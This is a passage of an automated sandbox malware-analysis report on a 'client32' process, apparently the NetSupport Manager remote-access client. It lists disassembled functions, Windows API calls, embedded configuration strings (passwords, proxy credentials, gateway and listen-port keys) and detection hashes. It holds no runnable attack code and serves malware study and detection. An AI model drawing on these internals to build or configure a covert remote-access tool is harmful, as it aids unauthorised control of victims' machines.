                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 3535843008-1834795898
                                                                              • Opcode ID: 94a73b77105bd84d94668242f28501390e16c566680df690e894548eff980490
                                                                              • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                              • Opcode Fuzzy Hash: 94a73b77105bd84d94668242f28501390e16c566680df690e894548eff980490
                                                                              • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61
                                                                              Function 11074CD0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                              • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                              • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                              • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                              • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                              • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                              • _strncpy.LIBCMT ref: 11074E38
                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                              • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
                                                                              • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                              • std::exception::exception.LIBCMT ref: 11075038
                                                                              • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInitializeSection$ChangeCloseCreateEnvironmentException@8ExpandFindNotificationStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                              • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                              • API String ID: 328462399-1497550179
                                                                              • Opcode ID: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                              • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                              • Opcode Fuzzy Hash: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                              • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65
                                                                              Function 11139A70 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A78400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                              • PostMessageA.USER32(00040414,000006CF,00000007,00000000), ref: 11139C4F
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SetWindowTextA.USER32(00040414,00000000), ref: 11139CF7
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139DBC
                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139DEA
                                                                              • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                              • EnableWindow.USER32(00040414,00000001), ref: 11139E27
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139E78
                                                                              • IsWindowVisible.USER32(00040414), ref: 11139E85
                                                                              • EnableWindow.USER32(00040414,00000000), ref: 11139E99
                                                                              • EnableWindow.USER32(00040414,00000000), ref: 11139DFF
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040414,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                              • EnableWindow.USER32(00040414,00000001), ref: 11139EAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                              • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                              • API String ID: 3453649892-3803836183
                                                                              • Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                              • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                              • Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                              • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791
                                                                              Function 110305F5 Relevance: 31.6, APIs: 5, Strings: 13, Instructions: 149windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11030645
                                                                              • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostwsprintf
                                                                              • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                              • API String ID: 875889313-3431570279
                                                                              • Opcode ID: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                              • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                              • Opcode Fuzzy Hash: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                              • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                              Function 110310D5 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 315COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(02CD8D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                              • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                              • API String ID: 1428277488-3745656997
                                                                              • Opcode ID: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                              • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                              • Opcode Fuzzy Hash: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                              • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                              Function 110310AC Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(02CD8D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                              • _sprintf.LIBCMT ref: 11031401
                                                                              • _setlocale.LIBCMT ref: 1103140B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                              • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                              • API String ID: 4242130455-3745656997
                                                                              • Opcode ID: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                              • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                              • Opcode Fuzzy Hash: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                              • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                              Function 110287A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • wsprintfA.USER32 ref: 11028814
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                              • wsprintfA.USER32 ref: 11028891
                                                                              • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                              • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                              • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                              • API String ID: 512045693-419896573
                                                                              • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                              • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                              • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                              • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                              Function 6EF033A0 Relevance: 27.6, APIs: 2, Strings: 16, Instructions: 571COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                              • API String ID: 2111968516-2157635994
                                                                              • Opcode ID: b1213b1c1b7755fc8d3fa045b13b2f8ec33e5a0eb188f85ee3bd666b0f6f2200
                                                                              • Instruction ID: 0296eb9e5139573654642e0e6c79d61a14b0bc8e5be0ff8a06591c480a7f981f
                                                                              • Opcode Fuzzy Hash: b1213b1c1b7755fc8d3fa045b13b2f8ec33e5a0eb188f85ee3bd666b0f6f2200
                                                                              • Instruction Fuzzy Hash: FD2294B2A00269AFDB20CFD4CCA4EEAB7BDAB49304F0485D9E54D67540D6315F85CF91
                                                                              Function 110860E0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(PCIINV.DLL,EE49F673,034768E0,034768D0,?,00000000,1118368C,000000FF,?,11032002,034768E0,00000000,?,?,?), ref: 11086115
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                              • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                              • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                              • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                              • wsprintfA.USER32 ref: 110861EB
                                                                              • wsprintfA.USER32 ref: 11086202
                                                                              • wsprintfA.USER32 ref: 11086219
                                                                              • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7591F550,?,?,11086390,?,11032002,034768E0,00000000,?,?,?), ref: 11085D68
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7591F550,?,?,11086390,?,11032002,034768E0,00000000,?,?,?), ref: 11085D7B
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7591F550,?,?,11086390,?,11032002,034768E0,00000000,?,?,?), ref: 11085D8E
                                                                                • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,7591F550,?,?,11086390,?,11032002,034768E0,00000000,?,?,?), ref: 11085DA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                              • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                              • API String ID: 4263811268-2492245516
                                                                              • Opcode ID: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                              • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                              • Opcode Fuzzy Hash: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
